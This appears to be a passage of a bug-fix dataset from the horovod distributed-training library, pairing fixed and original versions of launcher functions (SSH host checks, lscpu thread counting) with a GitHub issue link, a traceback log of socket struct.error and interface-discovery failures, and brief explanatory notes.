'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
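The repeated struct.error above comes from the wire protocol's length-prefix read: struct.unpack('i', ...) requires exactly 4 bytes, but rfile.read(4) can legally return fewer when the peer closes the connection early (for example, the short-lived probe connections made while testing interfaces). A minimal sketch of a stricter read loop, with hypothetical names (read_exact is not part of horovod):

import struct

def read_exact(rfile, n):
    # Read exactly n bytes from a file-like socket stream, or raise EOFError.
    buf = b""
    while len(buf) < n:
        chunk = rfile.read(n - len(buf))
        if not chunk:  # peer closed the connection before sending n bytes
            raise EOFError("connection closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf

def read_message_len(rfile):
    # Same 4-byte native-endian int prefix as the horovod wire format, but a
    # short read surfaces as a clear EOFError instead of a struct.error.
    return struct.unpack("i", read_exact(rfile, 4))[0]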
def _run_static(args):
all_host_names, _ = parse_hosts_and_slots(args.hosts)
nics_set = set(args.nics.split(",")) if args.nics else None
# horovodrun has to finish all the checks before this timeout runs out.
if args.start_timeout:
start_timeout = args.start_timeout
else:
# Lookup default timeout from the environment variable.
start_timeout = int(os.getenv("HOROVOD_START_TIMEOUT", "30"))
tmout = timeout.Timeout(
start_timeout,
message="Timed out waiting for {activity}. Please "
"check connectivity between servers. You "
"may need to increase the --start-timeout "
"parameter if you have too many servers.",
)
settings = hvd_settings.Settings(
verbose=2 if args.verbose else 0,
ssh_port=args.ssh_port,
extra_mpi_args=args.mpi_args,
tcp_flag=args.tcp_flag,
binding_args=args.binding_args,
key=secret.make_secret_key(),
start_timeout=tmout,
num_proc=args.np,
hosts=args.hosts,
num_hosts=len(all_host_names),
output_filename=args.output_filename,
run_func_mode=args.run_func is not None,
nics=nics_set,
)
# This cache stores the results of checks performed by horovod
# during the initialization step. It can be disabled by setting
# --disable-cache flag.
fn_cache = None
if not args.disable_cache:
params = ""
if args.np:
params += str(args.np) + " "
if args.hosts:
params += str(args.hosts) + " "
if args.ssh_port:
params += str(args.ssh_port)
parameters_hash = hashlib.md5(params.encode("utf-8")).hexdigest()
fn_cache = cache.Cache(
CACHE_FOLDER, CACHE_STALENESS_THRESHOLD_MINUTES, parameters_hash
)
if settings.verbose >= 2:
print("Filtering local host names.")
remote_host_names = network.filter_local_addresses(all_host_names)
if settings.verbose >= 2:
print("Remote host found: " + " ".join(remote_host_names))
if len(remote_host_names) > 0:
if settings.verbose >= 2:
print("Checking ssh on all remote hosts.")
# Check if we can ssh into all remote hosts successfully.
if not _check_all_hosts_ssh_successful(
remote_host_names, args.ssh_port, fn_cache=fn_cache
):
raise RuntimeError("could not connect to some hosts via ssh")
if settings.verbose >= 2:
print("SSH was successful into all the remote hosts.")
nics = driver_service.get_common_interfaces(
settings, all_host_names, remote_host_names, fn_cache
)
if args.run_func:
# get the driver IPv4 address
driver_ip = network.get_driver_ip(nics)
run_func_server = KVStoreServer(verbose=settings.verbose)
run_func_server_port = run_func_server.start_server()
put_data_into_kvstore(
driver_ip, run_func_server_port, "runfunc", "func", args.run_func
)
command = [
sys.executable,
"-m",
"horovod.run.run_task",
str(driver_ip),
str(run_func_server_port),
]
try:
_launch_job(args, settings, nics, command)
results = [None] * args.np
# TODO: make it parallel to improve performance
for i in range(args.np):
results[i] = read_data_from_kvstore(
driver_ip, run_func_server_port, "runfunc_result", str(i)
)
return results
finally:
run_func_server.shutdown_server()
else:
command = args.command
_launch_job(args, settings, nics, command)
return None
|
def _run_static(args):
all_host_names, _ = parse_hosts_and_slots(args.hosts)
nics_set = set(args.nics.split(",")) if args.nics else None
# horovodrun has to finish all the checks before this timeout runs out.
if args.start_timeout:
start_timeout = args.start_timeout
else:
# Lookup default timeout from the environment variable.
start_timeout = int(os.getenv("HOROVOD_START_TIMEOUT", "30"))
tmout = timeout.Timeout(
start_timeout,
message="Timed out waiting for {activity}. Please "
"check connectivity between servers. You "
"may need to increase the --start-timeout "
"parameter if you have too many servers.",
)
settings = hvd_settings.Settings(
verbose=2 if args.verbose else 0,
ssh_port=args.ssh_port,
extra_mpi_args=args.mpi_args,
tcp_flag=args.tcp_flag,
binding_args=args.binding_args,
key=secret.make_secret_key(),
start_timeout=tmout,
num_proc=args.np,
hosts=args.hosts,
num_hosts=len(all_host_names),
output_filename=args.output_filename,
run_func_mode=args.run_func is not None,
nics=nics_set,
)
# This cache stores the results of checks performed by horovod
# during the initialization step. It can be disabled by setting
# --disable-cache flag.
fn_cache = None
if not args.disable_cache:
params = ""
if args.np:
params += str(args.np) + " "
if args.hosts:
params += str(args.hosts) + " "
if args.ssh_port:
params += str(args.ssh_port)
parameters_hash = hashlib.md5(params.encode("utf-8")).hexdigest()
fn_cache = cache.Cache(
CACHE_FOLDER, CACHE_STALENESS_THRESHOLD_MINUTES, parameters_hash
)
if settings.verbose >= 2:
print("Filtering local host names.")
remote_host_names = network.filter_local_addresses(all_host_names)
if settings.verbose >= 2:
print("Remote host found: " + " ".join(remote_host_names))
if len(remote_host_names) > 0:
if settings.verbose >= 2:
print("Checking ssh on all remote hosts.")
# Check if we can ssh into all remote hosts successfully.
_check_all_hosts_ssh_successful(
remote_host_names, args.ssh_port, fn_cache=fn_cache
)
if settings.verbose >= 2:
print("SSH was successful into all the remote hosts.")
nics = driver_service.get_common_interfaces(
settings, all_host_names, remote_host_names, fn_cache
)
if args.run_func:
# get the driver IPv4 address
driver_ip = network.get_driver_ip(nics)
run_func_server = KVStoreServer(verbose=settings.verbose)
run_func_server_port = run_func_server.start_server()
put_data_into_kvstore(
driver_ip, run_func_server_port, "runfunc", "func", args.run_func
)
command = [
sys.executable,
"-m",
"horovod.run.run_task",
str(driver_ip),
str(run_func_server_port),
]
try:
_launch_job(args, settings, nics, command)
results = [None] * args.np
# TODO: make it parallel to improve performance
for i in range(args.np):
results[i] = read_data_from_kvstore(
driver_ip, run_func_server_port, "runfunc_result", str(i)
)
return results
finally:
run_func_server.shutdown_server()
else:
command = args.command
_launch_job(args, settings, nics, command)
return None
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
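The behavioural change in the _run_static pair above is small: _check_all_hosts_ssh_successful now returns a boolean and the caller raises RuntimeError("could not connect to some hosts via ssh") when any host is unreachable, rather than relying on the helper to abort on its own. A hedged sketch of what such a boolean helper could look like (illustrative only, not horovod's actual implementation, which runs its probes through safe_shell_exec):

import subprocess

def _probe_host_ssh(host, ssh_port):
    # Hypothetical per-host probe: run a no-op command over ssh in batch
    # mode and report success purely through the exit code (ssh_port is
    # assumed to be an int here).
    cmd = [
        "ssh", "-o", "BatchMode=yes", "-o", "StrictHostKeyChecking=no",
        "-p", str(ssh_port), host, "true",
    ]
    return subprocess.run(
        cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
    ).returncode == 0

def _check_all_hosts_ssh_successful(host_names, ssh_port, fn_cache=None):
    # fn_cache is accepted only for signature compatibility with the call
    # site above; this sketch does not cache results.
    return all(_probe_host_ssh(h, ssh_port) for h in host_names)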
def get_num_threads():
"""Returns the number of hardware threads."""
lscpu_cmd = (
"ssh -o PasswordAuthentication=no -o StrictHostKeyChecking=no "
"{host} {cmd}".format(
host=LSFUtils.get_compute_hosts()[0], cmd=LSFUtils._LSCPU_CMD
)
)
output = io.StringIO()
exit_code = safe_shell_exec.execute(lscpu_cmd, stdout=output, stderr=output)
if exit_code != 0:
raise RuntimeError(
"{cmd} failed with exit code {exit_code}".format(
cmd=lscpu_cmd, exit_code=exit_code
)
)
return int(yaml.safe_load(output.getvalue())[LSFUtils._THREAD_KEY])
|
def get_num_threads():
"""Returns the number of hardware threads."""
lscpu_cmd = "ssh -o StrictHostKeyChecking=no {host} {cmd}".format(
host=LSFUtils.get_compute_hosts()[0], cmd=LSFUtils._LSCPU_CMD
)
output = io.StringIO()
exit_code = safe_shell_exec.execute(lscpu_cmd, stdout=output, stderr=output)
if exit_code != 0:
raise RuntimeError(
"{cmd} failed with exit code {exit_code}".format(
cmd=lscpu_cmd, exit_code=exit_code
)
)
return int(yaml.safe_load(output.getvalue())[LSFUtils._THREAD_KEY])
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
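The only change in the get_num_threads pair above is the extra -o PasswordAuthentication=no ssh option. In a non-interactive launcher, an ssh that falls back to password authentication blocks forever on a prompt; disabling it makes the command fail fast with ssh's exit code 255, which the existing RuntimeError branch then reports. A small illustration (the host name is a placeholder):

host = "compute-node-0"  # placeholder compute host
cmd = "lscpu"

# Without the option, ssh may stop and wait for a password inside a batch job:
interactive = "ssh -o StrictHostKeyChecking=no {h} {c}".format(h=host, c=cmd)

# With it, an authentication failure returns immediately with exit code 255,
# so the RuntimeError above fires instead of the run hanging:
batch = ("ssh -o PasswordAuthentication=no -o StrictHostKeyChecking=no "
         "{h} {c}".format(h=host, c=cmd))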
def broadcast_optimizer_state(optimizer, root_rank):
"""
Broadcasts an optimizer state from root rank to all other processes.
Arguments:
optimizer: An optimizer.
root_rank: The rank of the process from which the optimizer will be
broadcasted to all other processes.
"""
if isinstance(optimizer, torch.optim.LBFGS):
# TODO(travis): L-BFGS cannot be easily supported without serializing
# the entire state_dict, as its structure is deeply nested and contains
# None type parameter values
raise ValueError("cannot broadcast torch.optim.LBFGS state")
state_dict = optimizer.state_dict()
# Newly created optimizers will not have their state initialized, so
# do that initialization here
if len(state_dict["state"]) == 0:
for group in optimizer.param_groups:
for p in group["params"]:
if p.requires_grad and id(p) not in state_dict["state"]:
p.grad = p.data.new(p.size()).zero_()
# This function accepts a torch.optim.Optimizer or a DistributedOptimizer
# wrapped around a torch optimizer. Calling step() with a DistributedOptimizer
